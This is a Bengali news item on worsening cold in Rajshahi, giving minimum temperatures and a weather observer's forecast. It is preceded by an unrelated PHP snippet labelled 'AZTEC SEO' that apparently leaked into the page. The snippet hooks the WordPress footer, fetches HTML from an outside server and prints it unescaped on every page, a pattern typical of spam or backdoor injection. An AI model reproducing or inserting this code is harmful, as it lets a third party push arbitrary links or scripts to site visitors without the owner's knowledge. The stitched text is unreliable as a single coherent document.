/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
রাজশাহীতে শীতের তীব্রতা আরও বেড়েছে। আজ বুধবার জেলায় সর্বনিম্ন তাপমাত্রা রেকর্ড হয়েছে ৮ দশমিক ২ ডিগ্রি সেলসিয়াস। মঙ্গলবার সর্বনিম্ন তাপমাত্রা ছিল ৮ দশমিক ৬ ডিগ্রি সেলসিয়াস। সোমবার সর্বনিম্ন তাপমাত্রা ছিল ১২ দশমিক ৫ ডিগ্রি সেলসিয়াস।
আজ সকালে রাজশাহী আবহাওয়া অফিসের পর্যবেক্ষক লতিফা হেলেন জানান, মেঘ কেটে যাওয়ায় গতকাল থেকে তাপমাত্রা হঠাৎ কমে গেছে। সামনের দুই-তিনদিন তাপমাত্রা আরও কমবে। এতে শীতের মাত্রা বাড়বে।
বুধবার সকালে সূর্যের দেখা মিললেও তেজ ছিল কম। উত্তরের কনকনে হিমেল হাওয়া ঘণ্টায় ৬-৭ কিলোমিটার বেগে বয়ে যাচ্ছে।